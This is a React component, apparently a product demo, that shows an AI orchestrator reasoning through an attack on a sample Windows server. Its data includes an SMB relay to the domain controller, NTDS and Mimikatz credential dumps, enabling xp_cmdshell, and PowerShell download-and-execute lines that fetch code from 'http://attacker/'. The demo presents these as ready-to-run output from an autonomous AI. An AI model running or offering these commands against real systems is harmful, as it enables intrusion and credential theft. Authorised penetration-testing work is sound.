import React, { useState } from 'react';
import { Brain, ArrowRight, Target, Search, Zap, Shield, TrendingUp, CheckCircle } from 'lucide-react';

const AIWorkflowVisual = () => {
  const [activeStep, setActiveStep] = useState(null);

  const exampleScan = {
    target: "192.168.1.50",
    os: "Windows Server 2019",
    ports: [
      { port: 80, service: "http", version: "Microsoft IIS 10.0" },
      { port: 445, service: "microsoft-ds", version: "Windows Server 2019" },
      { port: 1433, service: "ms-sql-s", version: "Microsoft SQL Server 2017" },
      { port: 3389, service: "ms-wbt-server", version: "Microsoft Terminal Services" }
    ]
  };

  const workflow = [
    {
      id: 1,
      title: "Contextualisation",
      icon: Search,
      color: "blue",
      observations: [
        "OS Windows Server 2019 → Environnement entreprise",
        "IIS + MSSQL → Stack Microsoft typique",
        "RDP open → Remote administration active",
        "SMB open → Likely network shares"
      ],
      hypotheses: [
        "Web/DB server for business application",
        "Likely domain-joined to AD",
        "Gestion centrale via GPO"
      ],
      questions: [
        "SMB signed/unsigned (relay vulnerable?)",
        "MSSQL avec auth Windows ou SQL?",
        "What application does IIS host?",
        "RDP with NLA enabled?"
      ]
    },
    {
      id: 2,
      title: "Vulnerability Search",
      icon: Shield,
      color: "purple",
      services: [
        {
          name: "SMB (445)",
          analysis: "Post-MS17-010 mais SMBGhost (CVE-2020-0796) possible",
          vulns: ["CVE-2020-0796 if unpatched", "SMB Relay if signing disabled"],
          action: "nmap --script smb-security-mode"
        },
        {
          name: "MSSQL (1433)",
          analysis: "Version 2017 secured but misconfiguration is common",
          vulns: ["xp_cmdshell enabled (RCE)", "Weak passwords", "Linked servers"],
          action: "Test connexion + enum"
        },
        {
          name: "IIS (80)",
          analysis: "Version 10.0 recent, depends on hosted app",
          vulns: ["Vulns app web", "Misconfig IIS"],
          action: "Nuclei + CMS detection"
        }
      ]
    },
    {
      id: 3,
      title: "Prioritization & Strategy",
      icon: TrendingUp,
      color: "green",
      priorities: [
        {
          rank: 1,
          target: "MSSQL",
          score: "85/100",
          impact: "RCE via xp_cmdshell = CRITIQUE",
          ease: "Weak credentials common",
          detection: "Moyenne"
        },
        {
          rank: 2,
          target: "SMB",
          score: "70/100",
          impact: "Relay → compromise AD",
          ease: "Depends on signing config",
          detection: "Faible"
        },
        {
          rank: 3,
          target: "Web App",
          score: "60/100",
          impact: "Variable selon app",
          ease: "In-depth analysis required",
          detection: "WAF/IDS potentiels"
        }
      ]
    },
    {
      id: 4,
      title: "Plan d'Action",
      icon: Zap,
      color: "yellow",
      phases: [
        {
          name: "Phase A - Enumeration",
          duration: "5-10 min",
          actions: [
            "enum4linux-ng -A 192.168.1.50",
            "nmap --script smb-security-mode",
            "mssqlclient.py test:test@192.168.1.50"
          ]
        },
        {
          name: "Phase B - Exploitation",
          scenarios: [
            {
              name: "MSSQL accessible",
              probability: "80%",
              steps: [
                "Test xp_cmdshell",
                "Si OK: RCE direct",
                "If blocked: Enum tables"
              ]
            },
            {
              name: "SMB relay",
              probability: "40%",
              steps: [
                "Responder + ntlmrelayx",
                "Relay vers DC",
                "Dump SAM/NTDS"
              ]
            }
          ]
        },
        {
          name: "Phase C - Post-Exploitation",
          actions: [
            "systeminfo, whoami /all",
            "Mimikatz credential dump",
            "Lateral movement prep"
          ]
        }
      ]
    },
    {
      id: 5,
      title: "Generated Commands",
      icon: CheckCircle,
      color: "brand-green",
      commands: [
        {
          phase: "Enum",
          cmds: [
            "enum4linux-ng -A 192.168.1.50 -oJ enum.json",
            "nmap -p445 --script smb-security-mode 192.168.1.50",
            "mssqlclient.py sa:password@192.168.1.50"
          ]
        },
        {
          phase: "Exploit",
          cmds: [
            "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
            "EXEC xp_cmdshell 'powershell IEX(IWR http://...)'"
          ]
        },
        {
          phase: "Post-Exploit",
          cmds: [
            "powershell -ep bypass -c \"IEX(IWR http://attacker/enum.ps1)\""
          ]
        }
      ]
    }
  ];

  return (
    <div className="space-y-6">
      <div className="bg-brand-black-light rounded-xl p-6 border border-brand-green/30">
        <div className="flex items-center gap-3 mb-6">
          <Brain className="w-8 h-8 text-brand-green" />
          <div>
            <h2 className="text-2xl font-bold text-brand-green">Reasoning and AI</h2>
            <p className="text-gray-400">Autonomous decision workflow of the AI orchestrator</p>
          </div>
        </div>

        {/* Exemple Cible */}
        <div className="bg-brand-black rounded-lg p-5 border border-blue-500/30 mb-6">
          <h3 className="font-bold text-white mb-3 flex items-center gap-2">
            <Target className="w-5 h-5 text-blue-400" />
            Exemple: {exampleScan.target} ({exampleScan.os})
          </h3>
          <div className="grid grid-cols-2 md:grid-cols-4 gap-3 text-sm font-mono">
            {exampleScan.ports.map((p, i) => (
              <div key={i} className="bg-brand-black-lighter p-2 rounded">
                <div className="text-brand-green">{p.port}/tcp</div>
                <div className="text-gray-400 text-xs">{p.service}</div>
              </div>
            ))}
          </div>
        </div>

        {/* Workflow Steps */}
        <div className="space-y-4">
          {workflow.map((step, index) => (
            <div
              key={step.id}
              className={`bg-brand-black rounded-lg border-2 transition-all cursor-pointer ${
                activeStep === step.id 
                  ? `border-${step.color}-500` 
                  : 'border-gray-800 hover:border-gray-700'
              }`}
              onClick={() => setActiveStep(activeStep === step.id ? null : step.id)}
            >
              <div className="p-4 flex items-center justify-between">
                <div className="flex items-center gap-3">
                  <div className={`w-10 h-10 rounded-full bg-${step.color}-500/20 border-2 border-${step.color}-500 flex items-center justify-center`}>
                    <step.icon className={`w-6 h-6 text-${step.color}-400`} />
                  </div>
                  <div>
                    <div className="text-white font-bold">Step {step.id}: {step.title}</div>
                    {activeStep !== step.id && (
                      <div className="text-xs text-gray-500">Click for details</div>
                    )}
                  </div>
                </div>
                <ArrowRight className={`w-5 h-5 text-gray-500 transition-transform ${activeStep === step.id ? 'rotate-90' : ''}`} />
              </div>

              {/* Detailed content */}
              {activeStep === step.id && (
                <div className="p-4 border-t border-gray-800">
                  {/* Step 1: Contextualization */}
                  {step.id === 1 && (
                    <div className="space-y-4">
                      <div>
                        <h4 className="font-bold text-purple-400 mb-2">Observations:</h4>
                        <ul className="space-y-1 text-sm">
                          {step.observations.map((obs, i) => (
                            <li key={i} className="text-gray-300">• {obs}</li>
                          ))}
                        </ul>
                      </div>
                      <div>
                        <h4 className="font-bold text-green-400 mb-2">Hypotheses:</h4>
                        <ul className="space-y-1 text-sm">
                          {step.hypotheses.map((hyp, i) => (
                            <li key={i} className="text-gray-300">→ {hyp}</li>
                          ))}
                        </ul>
                      </div>
                      <div>
                        <h4 className="font-bold text-yellow-400 mb-2">Questions Critiques:</h4>
                        <ul className="space-y-1 text-sm">
                          {step.questions.map((q, i) => (
                            <li key={i} className="text-gray-300">? {q}</li>
                          ))}
                        </ul>
                      </div>
                    </div>
                  )}

                  {/* Step 2: Vulnerabilities */}
                  {step.id === 2 && (
                    <div className="space-y-4">
                      {step.services.map((svc, i) => (
                        <div key={i} className="bg-brand-black-lighter p-4 rounded-lg">
                          <h4 className="font-bold text-brand-green mb-2">[{svc.name}]</h4>
                          <div className="text-sm text-gray-400 mb-2">{svc.analysis}</div>
                          <div className="space-y-1 text-sm">
                            {svc.vulns.map((v, j) => (
                              <div key={j} className="text-red-400">✓ {v}</div>
                            ))}
                          </div>
                          <div className="mt-2 text-xs text-cyan-400">→ Action: {svc.action}</div>
                        </div>
                      ))}
                    </div>
                  )}

                  {/* Step 3: Prioritization */}
                  {step.id === 3 && (
                    <div className="space-y-3">
                      {step.priorities.map((prio) => (
                        <div key={prio.rank} className="bg-brand-black-lighter p-4 rounded-lg border-l-4 border-brand-green">
                          <div className="flex items-center justify-between mb-2">
                            <div className="flex items-center gap-3">
                              <div className="text-2xl">{['🥇', '🥈', '🥉'][prio.rank-1]}</div>
                              <div>
                                <div className="font-bold text-white">{prio.target}</div>
                                <div className="text-xs text-gray-500">Score: {prio.score}</div>
                              </div>
                            </div>
                          </div>
                          <div className="grid grid-cols-3 gap-2 text-xs">
                            <div>
                              <span className="text-gray-500">Impact:</span>
                              <div className="text-red-400">{prio.impact}</div>
                            </div>
                            <div>
                              <span className="text-gray-500">Ease:</span>
                              <div className="text-yellow-400">{prio.ease}</div>
                            </div>
                            <div>
                              <span className="text-gray-500">Detection:</span>
                              <div className="text-blue-400">{prio.detection}</div>
                            </div>
                          </div>
                        </div>
                      ))}
                    </div>
                  )}

                  {/* Step 4: Plan */}
                  {step.id === 4 && (
                    <div className="space-y-4">
                      {step.phases.map((phase, i) => (
                        <div key={i} className="bg-brand-black-lighter p-4 rounded-lg">
                          <div className="font-bold text-brand-green mb-2">
                            {phase.name}
                            {phase.duration && <span className="text-xs text-gray-500 ml-2">({phase.duration})</span>}
                          </div>
                          {phase.actions && (
                            <div className="space-y-1 text-sm text-gray-300">
                              {phase.actions.map((action, j) => (
                                <div key={j} className="font-mono text-xs bg-brand-black p-2 rounded">
                                  {action}
                                </div>
                              ))}
                            </div>
                          )}
                          {phase.scenarios && (
                            <div className="space-y-2">
                              {phase.scenarios.map((scenario, j) => (
                                <div key={j} className="ml-4 border-l-2 border-brand-green/30 pl-3">
                                  <div className="text-sm font-medium text-white mb-1">
                                    {scenario.name} <span className="text-brand-green">({scenario.probability})</span>
                                  </div>
                                  <ul className="text-xs text-gray-400 space-y-1">
                                    {scenario.steps.map((step, k) => (
                                      <li key={k}>• {step}</li>
                                    ))}
                                  </ul>
                                </div>
                              ))}
                            </div>
                          )}
                        </div>
                      ))}
                    </div>
                  )}

                  {/* Step 5: Commands */}
                  {step.id === 5 && (
                    <div className="space-y-4">
                      {step.commands.map((cmdGroup, i) => (
                        <div key={i}>
                          <h4 className="font-bold text-cyan-400 mb-2"># {cmdGroup.phase}</h4>
                          <div className="space-y-2">
                            {cmdGroup.cmds.map((cmd, j) => (
                              <div key={j} className="bg-brand-black p-3 rounded font-mono text-sm text-brand-green border border-gray-800">
                                {cmd}
                              </div>
                            ))}
                          </div>
                        </div>
                      ))}
                    </div>
                  )}
                </div>
              )}
            </div>
          ))}
        </div>

        {/* Legend */}
        <div className="mt-6 bg-brand-black rounded-lg p-4 border border-gray-800">
          <div className="text-sm text-gray-400">
            <div className="font-bold text-white mb-2">💡 Comment fonctionne l'IA:</div>
            <ul className="space-y-1">
              <li>• The AI analyzes scan results in 5 reasoning steps</li>
              <li>• Each decision is based on real attack patterns</li>
              <li>• Generated commands are ready to execute</li>
              <li>• The workflow adapts based on results obtained</li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  );
};

export default AIWorkflowVisual;
